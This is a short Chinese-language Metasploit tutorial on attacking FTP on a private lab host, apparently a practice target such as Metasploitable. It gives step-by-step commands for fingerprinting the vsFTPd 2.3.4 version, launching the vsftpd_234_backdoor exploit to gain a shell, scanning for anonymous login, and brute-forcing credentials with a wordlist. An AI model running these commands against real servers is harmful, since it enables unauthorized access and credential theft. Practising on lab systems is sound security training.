1.使用ftp_version查看信息
搜索模块
msf5 > search ftp_version
使用模块,查看信息
msf5 > use auxiliary/scanner/ftp/ftp_version
msf5 auxiliary(scanner/ftp/ftp_version) > show options
msf5 auxiliary(scanner/ftp/ftp_version) > set RHOSTS 192.168.132.180
msf5 auxiliary(scanner/ftp/ftp_version) > set THREADS 14
msf5 auxiliary(scanner/ftp/ftp_version) > run
扫描处结果是vsFTPd 2.3.4,搜索这个版本
msf5 > search 2.3.4
加载模块,查看信息
msf5 > use exploit/unix/ftp/vsftpd_234_backdoor
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show options
配置信息,run
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.132.180
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > run
进入后可以执行操作
2:ftp匿名登录扫描
msf5 > use auxiliary/scanner/ftp/anonymous
msf5 auxiliary(scanner/ftp/anonymous) show options
配置信息
msf5 auxiliary(scanner/ftp/anonymous) > set RHOSTS 192.168.132.180
msf5 auxiliary(scanner/ftp/anonymous) > run
3:ftp暴力破解
搜索模块
msf5 > search ftp_login
加载模块,查看配置
msf5 > use auxiliary/scanner/ftp/ftp_login
msf5 auxiliary(scanner/ftp/ftp_login) > show options
配置信息
sf5 auxiliary(scanner/ftp/ftp_login) > set RHOSTS 192.168.132.180
msf5 auxiliary(scanner/ftp/ftp_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
msf5 auxiliary(scanner/ftp/ftp_login) > run
这里的脚本因为我实现写入了msfadmin msfadmin所以最后扫描成功了